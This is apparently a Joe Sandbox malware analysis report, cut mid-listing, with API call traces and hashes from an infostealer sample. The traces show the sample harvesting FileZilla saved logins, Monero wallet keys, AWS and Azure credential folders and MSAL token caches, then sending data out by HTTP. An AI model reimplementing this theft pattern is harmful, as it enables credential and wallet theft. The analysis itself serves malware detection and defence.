                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: 4af60057d3bd791a5c791b325f6690ebbc6fbf4d0995b654951c414554aaa799
                                • Instruction ID: 8184a971f0089908a74a5ae9c1befff23b153b1dba73f3ab5608e3a5fa90d127
                                • Opcode Fuzzy Hash: 4af60057d3bd791a5c791b325f6690ebbc6fbf4d0995b654951c414554aaa799
                                • Instruction Fuzzy Hash: 2941F7F3A181204BF3189D3DEC8576BBAC9D794324F1B863DEA98D7784E8799C0582C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: 1146ff09b2355ba9b082ed24615a2389708d821eeda917863666c30417ba4452
                                • Instruction ID: 72cd9152a5eab924667f5bff64c33a1efd5fb3d625b5960bb98913636312da28
                                • Opcode Fuzzy Hash: 1146ff09b2355ba9b082ed24615a2389708d821eeda917863666c30417ba4452
                                • Instruction Fuzzy Hash: 1F41F7F3A081144FE310A92CDD4573AB7D6EFD4720F2A863DDB98C7780F53999058282
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: fb3b31f5cb300bd4bd508664562b4c4093d3d88ab852762a90d36e3464151d16
                                • Instruction ID: edcdd5f0c2774d29205268671ee526563f47d77eb403d2db77c9b1ee488923ba
                                • Opcode Fuzzy Hash: fb3b31f5cb300bd4bd508664562b4c4093d3d88ab852762a90d36e3464151d16
                                • Instruction Fuzzy Hash: EE4136F7608200AFD3006E2DDCC566EFBE9EBA8264F1A053DE2C1C7750F63094118647
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: d49764a7ee59b944b660f9501deb153fd4baf4ba9c56b330426f0ef6e8443292
                                • Instruction ID: 204b7c70f294e4cbd4548ae96e0e87d75a7ae39cdb264a47c7e54a852ae9f300
                                • Opcode Fuzzy Hash: d49764a7ee59b944b660f9501deb153fd4baf4ba9c56b330426f0ef6e8443292
                                • Instruction Fuzzy Hash: 352106B250C308AFE301BE6ADC4566EFBE5FFA8310F06492CD6D483310E731A5249A97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00510DBA,00510DB7,00510DB6,00510DB3), ref: 00500362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00500369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00500385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 005003CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 005003DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00500419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00500463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00500562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00500571
                                • lstrcat.KERNEL32(?,url: ), ref: 00500580
                                • lstrcat.KERNEL32(?,00000000), ref: 00500593
                                • lstrcat.KERNEL32(?,00511678), ref: 005005A2
                                • lstrcat.KERNEL32(?,00000000), ref: 005005B5
                                • lstrcat.KERNEL32(?,0051167C), ref: 005005C4
                                • lstrcat.KERNEL32(?,login: ), ref: 005005D3
                                • lstrcat.KERNEL32(?,00000000), ref: 005005E6
                                • lstrcat.KERNEL32(?,00511688), ref: 005005F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00500604
                                • lstrcat.KERNEL32(?,00000000), ref: 00500617
                                • lstrcat.KERNEL32(?,00511698), ref: 00500626
                                • lstrcat.KERNEL32(?,0051169C), ref: 00500635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: acb848afd3ddbf111d29fe8b0d70f272c7a18a3bd5cf2288ca3c021948431487
                                • Instruction ID: 10f6afd0eb6d3d78b70e3a1d882494ea5016bbdc93ab2a8cceac3ce656d38ed5
                                • Opcode Fuzzy Hash: acb848afd3ddbf111d29fe8b0d70f272c7a18a3bd5cf2288ca3c021948431487
                                • Instruction Fuzzy Hash: FFD12F71900209ABDB04EBF4DD9AEEE7B78FF94301F408518F102A60D5EF75AA46CB65
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F59F8
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012DE360,00000000,?,012D9BE8,00000000,?,00511A1C), ref: 004F5E71
                                • lstrlen.KERNEL32(00000000), ref: 004F5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004F5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F5E9A
                                • lstrlen.KERNEL32(00000000), ref: 004F5EAF
                                • lstrlen.KERNEL32(00000000), ref: 004F5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004F5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 004F5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004F5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004F5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FBD
                                • HttpOpenRequestA.WININET(00000000,012DE3F0,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F5BF8
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 5188c31d302a22e8761ae3385a4a00346f86b82cb91f02b3626ffdf9e03f4606
                                • Instruction ID: ff3e8b03979a4e61fb6ca0760a81e67670e9cca27a07ae66d9e0929ec7cc24ef
                                • Opcode Fuzzy Hash: 5188c31d302a22e8761ae3385a4a00346f86b82cb91f02b3626ffdf9e03f4606
                                • Instruction Fuzzy Hash: FE122372920219ABDB15EBA0DC9AFEEB778BF54700F408199F106620D1EF742B49CF65
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004FD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004FD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD208
                                • lstrcat.KERNEL32(?,00511478), ref: 004FD217
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD22A
                                • lstrcat.KERNEL32(?,0051147C), ref: 004FD239
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD24C
                                • lstrcat.KERNEL32(?,00511480), ref: 004FD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD26E
                                • lstrcat.KERNEL32(?,00511484), ref: 004FD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD290
                                • lstrcat.KERNEL32(?,00511488), ref: 004FD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD2B2
                                • lstrcat.KERNEL32(?,0051148C), ref: 004FD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD2D4
                                • lstrcat.KERNEL32(?,00511490), ref: 004FD2E3
                                  • Part of subcall function 0050A820: lstrlen.KERNEL32(004F4F05,?,?,004F4F05,00510DDE), ref: 0050A82B
                                  • Part of subcall function 0050A820: lstrcpy.KERNEL32(00510DDE,00000000), ref: 0050A885
                                • lstrlen.KERNEL32(?), ref: 004FD32A
                                • lstrlen.KERNEL32(?), ref: 004FD339
                                  • Part of subcall function 0050AA70: StrCmpCA.SHLWAPI(012D8940,004FA7A7,?,004FA7A7,012D8940), ref: 0050AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 004FD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 969a3f498261903dff3185bc10cd7cee1179e62670dc4bae683407b0a9da10d7
                                • Instruction ID: 175017923d9de0cee01c440759243b4d5950fd330d2f0e56a930d5c651f5a3cd
                                • Opcode Fuzzy Hash: 969a3f498261903dff3185bc10cd7cee1179e62670dc4bae683407b0a9da10d7
                                • Instruction Fuzzy Hash: 88E15F71910209ABDB04EBA0DD9AEEE7B78BF94301F108158F507A70D1DF39AE45CB66
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012DC940,00000000,?,0051144C,00000000,?,?), ref: 004FCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004FCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004FCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004FCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004FCAD9
                                • StrStrA.SHLWAPI(?,012DC958,00510B52), ref: 004FCAF7
                                • StrStrA.SHLWAPI(00000000,012DCA90), ref: 004FCB1E
                                • StrStrA.SHLWAPI(?,012DD6B8,00000000,?,00511458,00000000,?,00000000,00000000,?,012D8830,00000000,?,00511454,00000000,?), ref: 004FCCA2
                                • StrStrA.SHLWAPI(00000000,012DD798), ref: 004FCCB9
                                  • Part of subcall function 004FC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004FC871
                                  • Part of subcall function 004FC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004FC87C
                                • StrStrA.SHLWAPI(?,012DD798,00000000,?,0051145C,00000000,?,00000000,012D8860), ref: 004FCD5A
                                • StrStrA.SHLWAPI(00000000,012D8AB0), ref: 004FCD71
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B46), ref: 004FC943
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B47), ref: 004FC957
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B4E), ref: 004FC978
                                • lstrlen.KERNEL32(00000000), ref: 004FCE44
                                • CloseHandle.KERNEL32(00000000), ref: 004FCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 831781cee902fe5c6ecec537470446fb47bc87edf8aebcad5270110a2a2d519d
                                • Instruction ID: c3387fb3dc4ac5669d24c21cd669807623502d5ec88870027257425c390e4962
                                • Opcode Fuzzy Hash: 831781cee902fe5c6ecec537470446fb47bc87edf8aebcad5270110a2a2d519d
                                • Instruction Fuzzy Hash: A5E10172D10209ABDB14EBA4DC9AFEEBB78BF54300F408159F106671D1EF346A4ACB65
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • RegOpenKeyExA.ADVAPI32(00000000,012DAC00,00000000,00020019,00000000,005105B6), ref: 005083A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00508426
                                • wsprintfA.USER32 ref: 00508459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0050847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508499
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 2082caef292d38d025dc05539fd168fffc5bbcd430b95b228c0108477c8fcaca
                                • Instruction ID: e6a4f51aaac03836bd41b5f4198a041a43499567fe05e6b5721593354dedea92
                                • Opcode Fuzzy Hash: 2082caef292d38d025dc05539fd168fffc5bbcd430b95b228c0108477c8fcaca
                                • Instruction Fuzzy Hash: 5C810B71910218ABEB24DB50CD95FEEBBB8FF58700F00C698E149A6180DF756B85CFA5
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00504DCD
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 0050492C
                                  • Part of subcall function 00504910: FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                • lstrcat.KERNEL32(?,00000000), ref: 00504E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00504E59
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                  • Part of subcall function 00504910: FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                  • Part of subcall function 00504910: FindClose.KERNEL32(000000FF), ref: 00504B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00504EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00504EE5
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 005049B0
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,005108D2), ref: 005049C5
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 005049E2
                                  • Part of subcall function 00504910: PathMatchSpecA.SHLWAPI(?,?), ref: 00504A1E
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,012DE320), ref: 00504A4A
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,00510FF8), ref: 00504A5C
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,?), ref: 00504A70
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,00510FFC), ref: 00504A82
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,?), ref: 00504A96
                                  • Part of subcall function 00504910: CopyFileA.KERNEL32(?,?,00000001), ref: 00504AAC
                                  • Part of subcall function 00504910: DeleteFileA.KERNEL32(?), ref: 00504B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
